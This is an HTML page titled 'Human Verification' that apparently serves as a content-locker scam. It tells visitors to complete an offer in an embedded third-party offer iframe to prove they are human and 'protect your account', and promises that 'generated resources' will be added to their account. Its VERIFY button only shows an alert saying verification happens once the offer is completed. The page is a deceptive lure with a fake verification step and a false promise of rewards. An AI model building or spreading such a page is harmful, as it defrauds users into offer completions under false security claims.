<html>
  
  <head>
    <meta charset="utf-8">
    <title>Human Verification</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" href="https://muhadda.github.io/t32/verif/fav.png" type="image/x-icon">
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
    <script type="text/javascript" src="https://netdna.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.3.0/css/font-awesome.min.css"
    rel="stylesheet" type="text/css">
    <link href="https://pingendo.github.io/pingendo-bootstrap/themes/default/bootstrap.css"
    rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">
    <style>
      body{
       font-family: 'Roboto', sans-serif; 
        background-image: url(https://i.imgur.com/2dvRTJ1.jpg);
    background-repeat: no-repeat;
    background-size: cover;
    background-attachment: fixed;
      }
      .well {
    border-radius: 0px;
        background-color:#fff;
            margin: auto;
    max-width: 500px;
  }
      #titlec{
      color:#fff;
        background-color:#3079d2;
        padding:10px;
        text-align:center;
        font-weight:bold;
        font-size:16px
      }
      #legenda{
      font-size:10px;
      }
    </style>
  </head>
  
  <body>
    <div class="section">
      <div class="container">
        <div class="row">
          <div class="col-md-12">
            <div class="well">
              <div id="titlec">Are you a human?</div>
              <p style="text-align:center;">
                <br>Complete an offer below to verify you're human:
                <br>
                <span id="legenda">This action is required once, it will not appear when you visit this site
                  again. You must complete this verification to
                  <b>protect your account</b> and safeguard our system from spam bots.</span>
              </p>
              <div id="offers">
                <iframe src="https://swipebo.com/public/offers/iframe.php?it=175688&amp;key=69a34"
                height="200px" marginwidth="0" marginheight="0" align="middle" frameborder="0"
                width="100%"></iframe>
              </div>
              <p style="text-align:center;">Once verification is complete, all generated resources will be added to
                your account.</p>
              <div id="rodape" style="margin-bottom:15px;">
                <img src="https://i.imgur.com/u14R0BF.png?1">
                <a class="btn btn-primary" id="verify" style="float:right;background-color:#3079d2;">VERIFY</a>
              </div>
            </div>
          </div>
        </div>
        <div class="row">
          <div class="col-md-12">
          </div>
        </div>
      </div>
    </div>
  </body>
<script>
  $( "#verify" ).click(function() {
  alert("You will be automatically verified once offer completion confirmation is received.");
});
</script>
</html>
